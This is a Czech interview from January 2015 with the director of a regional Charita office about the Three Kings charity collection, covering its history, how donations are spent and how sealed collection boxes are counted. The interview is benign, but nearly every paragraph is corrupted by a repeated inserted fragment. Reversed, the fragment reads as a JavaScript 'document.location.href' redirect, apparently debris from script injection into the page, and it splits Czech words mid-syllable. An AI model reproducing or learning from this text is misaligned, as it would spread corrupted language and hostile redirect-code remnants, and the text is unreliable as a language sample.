Jana Zelená
Rainbow page separator

Jana Zelená: Děkuji všem koledníčkům, kteří pomáhají potřebným

Neděle, 11. ledna 2015

Již po patnácté v his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii Charity probíhá celostátní kampaň s názvem Tříkrálová sbírka. Tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to veřejnou sbírku pořádá Charita Česká republika v období od 1. do 14. ledna 2015. V uvedené době je možné kontak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat v ulicích měst a obcí skupinky tří koledujících králů. Pokladničky jsou zapečetěny a opatřeny razítkem městského nebo obecního úřadu. Jak ale probíhá následné rozpečeťování kasiček, sčítání peněz a garance využití finančních prostředků k charitativním účelům? Nejen na ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to otázky odpoví Ing. Jana Zelená, ředitelka Oblastní charity Žďár nad Sázavou.

Jana Zelená

Jana Zelená

Paní ředitelko, jsme v druhé polovině konání sbírky. Vzpomenete si na začátky té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kampaně ve Vaší Charitě? Kdy [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vlastně všechno začalo?
Úplné začátky Tříkrálové sbírky spadají do roku 2001, kdy jsem ještě v Oblastní charitě Žďár nad Sázavou nepůsobila. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roce proběhla sbírka pouze v malé části města Žďáru nad Sázavou. O rok později, v roce 2002, proběhla sbírka už ve více městech a obcích okresu, ale zdaleka nedosáhla současného rozsahu. Tříkrálovou sbírku 2003 jsem již zažila na „vlastní kůži“. Bylo mi jasné, že pokud budeme chtít Tříkrálovou sbírku rozšířit na celé území žďárského okresu, je třeba, aby se její přípravě, samotnému průběhu i dokončení, tedy její koordinaci věnoval alespoň jeden člověk na plný úvazek s tím, že se do sbírky zapojí celá řada dobrovolníků – místních koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů, kteří osloví vedoucí skupinek a ti zase koledníčky. V roce 2003 se tedy poprvé objevila v Oblastní charitě funkce koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora Tříkrálové sbírky, se kterým jsme z počátku společně tvořili strategické plány, oslovovali dobrovolné spolupracovníky a koledníky. Bylo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to velmi náročné období, ale stálo za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, neboť Tříkrálová sbírka znamená získání značné částky financí pro potřeby uživatelů služeb Oblastní charity Žďár nad Sázavou, ale i ostatních lidí ze žďárského okresu, kteří se dostali do tíživé sociální situace a potřebují naši pomoc.

Jako nezisková organizace získáváte peníze na provoz Vašich zařízení z ministerstev, měst a obcí, nadací apod. K čemu jsou pro Vás dary z Tříkrálové sbírky potřebné?
Finanční prostředky z Tříkrálové sbírky se využívají převážně na aktivity, na které by naše organizace jen těžko hledala zdroje. Čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se jedná o krytí investičních nákladů jako zakoupení au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu pro naše terénní služby, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože díky těm[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vozům můžeme být velmi flexibilní a pomáhat tam, kde je nás v danou chvíli opravdu třeba. Dále jde o nutné rekonstrukce našich pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, aby byly přístupnější našim uživatelům a odpovídaly jejich požadavkům. Někdy se z ministerstev a obcí nepodaří získat potřebné množství financí k udržení provozu některého zařízení, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nám velmi pomůže finanční podpora právě z Tříkrálové sbírky.

Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní sbírka jde pomalu do finále. Jak probíhá následné rozpečeťování kasiček a sčítání darů?
Zapečeťování prázdných i rozpečeťování plných pokladniček probíhá za dohledu finančního odboru příslušných obecních a městských úřadů. Každá pokladnička je rozpečetěna, počty bankovek a mincí zaznamenány do výčetek, spočteny výtěžky jednotlivých pokladniček, na základě kterých je pak určena celková částka, která musí odpovídat částce vložené na sbírkový účet. U zapečeťování i rozpečeťování musí vždy být pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomen jak pracovník obecního úřadu, tak pracovník Oblastní charity, kteří svými podpisy potvrdí správnost částky výtěžku.

V té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sbírkové kampani je právě zapojeno přes 1600 dobrovolníků bývalého okresu Žďár. To je úctyhodné číslo. Chcete jim předat nějaký vzkaz?
Určitě chci všechny srdečně pozdravit a moc jim poděkovat. Bez jejich ochoty udělat něco pro dobrou věc by [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž nešlo. Děkuji tedy všem tříkrálovým koledníkům, kteří každoročně vycházejí do ulic a navštěvují naše domovy, aby nám popřáli do nového roku hodně štěstí a zdraví, přinesli všem onu radostnou zvěst a při[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom vykoledovali dary, které pomohou potřebným nejen v našem regionu. Veliké díky vám všem!

Děkuji za rozhovor.
Lenka Šustrová